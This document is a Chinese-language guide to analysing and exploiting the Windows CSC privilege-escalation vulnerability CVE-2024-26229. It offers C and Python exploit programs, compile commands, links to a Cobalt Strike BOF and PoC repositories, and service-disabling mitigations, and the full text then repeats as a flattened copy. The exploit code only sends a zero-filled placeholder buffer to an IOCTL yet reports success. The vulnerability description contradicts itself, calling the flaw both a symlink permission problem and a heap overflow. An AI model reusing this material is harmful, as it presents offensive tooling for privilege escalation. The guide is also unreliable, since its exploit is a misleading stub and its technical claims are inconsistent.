Windows CSC 提权漏洞 CVE-2024-26229 技术分析与利用指南

1. 漏洞概述

CVE-2024-26229 是影响 Windows 操作系统客户端缓存(CSC)服务的高危权限提升漏洞，CVSS 评分为 7.8 分（高危）。该漏洞涉及 CSC 服务在处理文件和文件夹符号链接时的权限检查不足问题。

漏洞本质

漏洞类型：基于堆的缓冲区溢出 (CWE-122)
攻击向量：本地利用
影响范围：权限提升至 SYSTEM 级别

2. 受影响系统版本

主要受影响系统

Windows Server 2022 (包括 Server Core)
Windows Server 2019 (包括 Server Core)
Windows Server 2016 (包括 Server Core)
Windows 11 (21H2/22H2/23H2)
Windows 10 (1607/1809/21H2/22H2)

特殊说明

服务状态要求：目标主机必须启用 CSC 服务
默认配置：Windows Server 2016/2019/2022 默认禁用 CSC 服务
例外情况：部分报告显示 Windows 10 系统可成功复现

3. 漏洞技术分析

漏洞机制

符号链接处理缺陷：CSC 服务在处理符号链接时未正确验证权限
权限提升路径：通过恶意符号链接绕过文件访问控制
攻击效果：
- 访问敏感系统文件
- 修改/删除关键系统文件
- 执行任意代码

攻击流程

创建精心设计的符号链接
通过特定 IOCTL (0x222000) 发送恶意请求
触发缓冲区溢出或权限绕过
实现权限提升

4. 漏洞利用准备

环境要求

目标系统已启用 CSC 服务
攻击者具有普通用户权限
需要本地执行权限

检测 CSC 服务状态

Get-Service -Name "CscService"

运行状态应为 "Running"
若为 "Stopped" 或 "Disabled" 则无法利用

5. 漏洞利用实现

方法一：使用公开 POC (C 语言实现)

#include <Windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice = CreateFile("\\\\.\\CSCService", 
                               GENERIC_WRITE, 
                               0, 
                               NULL, 
                               OPEN_EXISTING, 
                               FILE_ATTRIBUTE_NORMAL, 
                               NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open CSC device\n");
        return 1;
    }

    DWORD bytesReturned;
    char payload[100] = {0};  // 需根据实际情况构造有效负载
    
    BOOL status = DeviceIoControl(hDevice, 
                                 0x222000, 
                                 payload, 
                                 sizeof(payload), 
                                 NULL, 
                                 0, 
                                 &bytesReturned, 
                                 NULL);
    
    if (!status) {
        printf("Exploit failed (Error: %d)\n", GetLastError());
        return 1;
    }

    printf("Exploit payload sent successfully\n");
    CloseHandle(hDevice);
    return 0;
}

编译命令：

gcc -o exploit.exe exploit.c

方法二：使用 Beacon 对象文件(BOF)实现

适用于 Cobalt Strike 和 BruteRatel 框架：

获取 BOF 代码：

https://github.com/NVISOsecurity/CVE-2024-26229-BOF

编译命令：

gcc -c CVE-2024-26229-bof.c -o CVE-2024-26229-bof.o

方法三：使用 Python 实现

import ctypes
from ctypes import wintypes

kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)

GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FILE_ATTRIBUTE_NORMAL = 0x80

# 定义DeviceIoControl
DeviceIoControl = kernel32.DeviceIoControl
DeviceIoControl.argtypes = [
    wintypes.HANDLE,      # hDevice
    wintypes.DWORD,       # dwIoControlCode
    wintypes.LPVOID,      # lpInBuffer
    wintypes.DWORD,       # nInBufferSize
    wintypes.LPVOID,      # lpOutBuffer
    wintypes.DWORD,       # nOutBufferSize
    wintypes.LPDWORD,     # lpBytesReturned
    wintypes.LPVOID       # lpOverlapped
]
DeviceIoControl.restype = wintypes.BOOL

def exploit():
    device_name = "\\\\.\\CSCService"
    
    # 打开设备
    hDevice = kernel32.CreateFileW(
        device_name,
        GENERIC_WRITE,
        0,
        None,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        None
    )
    
    if hDevice == -1:
        print(f"Failed to open device. Error: {ctypes.get_last_error()}")
        return False
    
    # 准备payload
    ioctl_code = 0x222000
    payload = bytes(100)  # 需构造实际有效payload
    
    bytes_returned = wintypes.DWORD(0)
    
    # 发送IOCTL
    status = DeviceIoControl(
        hDevice,
        ioctl_code,
        payload,
        len(payload),
        None,
        0,
        ctypes.byref(bytes_returned),
        None
    )
    
    if not status:
        print(f"Exploit failed. Error: {ctypes.get_last_error()}")
        kernel32.CloseHandle(hDevice)
        return False
    
    print("Exploit succeeded!")
    kernel32.CloseHandle(hDevice)
    return True

if __name__ == "__main__":
    exploit()

6. 漏洞防护措施

临时缓解方案

禁用 CSC 服务：

Stop-Service -Name "CscService" -Force
Set-Service -Name "CscService" -StartupType Disabled

应用组策略限制：
- 禁用离线文件功能
- 限制符号链接创建权限

长期解决方案

安装微软官方安全补丁
定期更新 Windows 系统

7. 参考资源

官方漏洞描述：
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-26229
- Microsoft Security Advisory
利用代码仓库：
- BOF实现: https://github.com/NVISOsecurity/CVE-2024-26229-BOF
- POC代码: https://github.com/varwara/CVE-2024-26229
相关技术文档：
- Windows CSC 服务官方文档
- 符号链接安全最佳实践

附录：完整受影响版本列表

序号	系统版本	版本号
1	Windows Server 2022, 23H2 Edition (Server Core)	10.0.25398.830
2	Windows Server 2012 R2	6.3.9600.21924
...	...	...
36	Windows 10 Version 1809 for 32-bit Systems	10.0.17763.5696

（完整列表见原始文档）

Windows CSC 提权漏洞 CVE-2024-26229 技术分析与利用指南 1. 漏洞概述 CVE-2024-26229 是影响 Windows 操作系统客户端缓存(CSC)服务的高危权限提升漏洞，CVSS 评分为 7.8 分（高危）。该漏洞涉及 CSC 服务在处理文件和文件夹符号链接时的权限检查不足问题。漏洞本质漏洞类型：基于堆的缓冲区溢出 (CWE-122) 攻击向量：本地利用影响范围：权限提升至 SYSTEM 级别 2. 受影响系统版本主要受影响系统 Windows Server 2022 (包括 Server Core) Windows Server 2019 (包括 Server Core) Windows Server 2016 (包括 Server Core) Windows 11 (21H2/22H2/23H2) Windows 10 (1607/1809/21H2/22H2) 特殊说明服务状态要求：目标主机必须启用 CSC 服务默认配置：Windows Server 2016/2019/2022 默认禁用 CSC 服务例外情况：部分报告显示 Windows 10 系统可成功复现 3. 漏洞技术分析漏洞机制符号链接处理缺陷：CSC 服务在处理符号链接时未正确验证权限权限提升路径：通过恶意符号链接绕过文件访问控制攻击效果：访问敏感系统文件修改/删除关键系统文件执行任意代码攻击流程创建精心设计的符号链接通过特定 IOCTL (0x222000) 发送恶意请求触发缓冲区溢出或权限绕过实现权限提升 4. 漏洞利用准备环境要求目标系统已启用 CSC 服务攻击者具有普通用户权限需要本地执行权限检测 CSC 服务状态运行状态应为 "Running" 若为 "Stopped" 或 "Disabled" 则无法利用 5. 漏洞利用实现方法一：使用公开 POC (C 语言实现) 编译命令：方法二：使用 Beacon 对象文件(BOF)实现适用于 Cobalt Strike 和 BruteRatel 框架：获取 BOF 代码：编译命令：方法三：使用 Python 实现 6. 漏洞防护措施临时缓解方案禁用 CSC 服务：应用组策略限制：禁用离线文件功能限制符号链接创建权限长期解决方案安装微软官方安全补丁定期更新 Windows 系统 7. 参考资源官方漏洞描述： NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-26229 Microsoft Security Advisory 利用代码仓库： BOF实现: https://github.com/NVISOsecurity/CVE-2024-26229-BOF POC代码: https://github.com/varwara/CVE-2024-26229 相关技术文档： Windows CSC 服务官方文档符号链接安全最佳实践附录：完整受影响版本列表 | 序号 | 系统版本 | 版本号 | |------|---------|--------| | 1 | Windows Server 2022, 23H2 Edition (Server Core) | 10.0.25398.830 | | 2 | Windows Server 2012 R2 | 6.3.9600.21924 | | ... | ... | ... | | 36 | Windows 10 Version 1809 for 32-bit Systems | 10.0.17763.5696 | （完整列表见原始文档）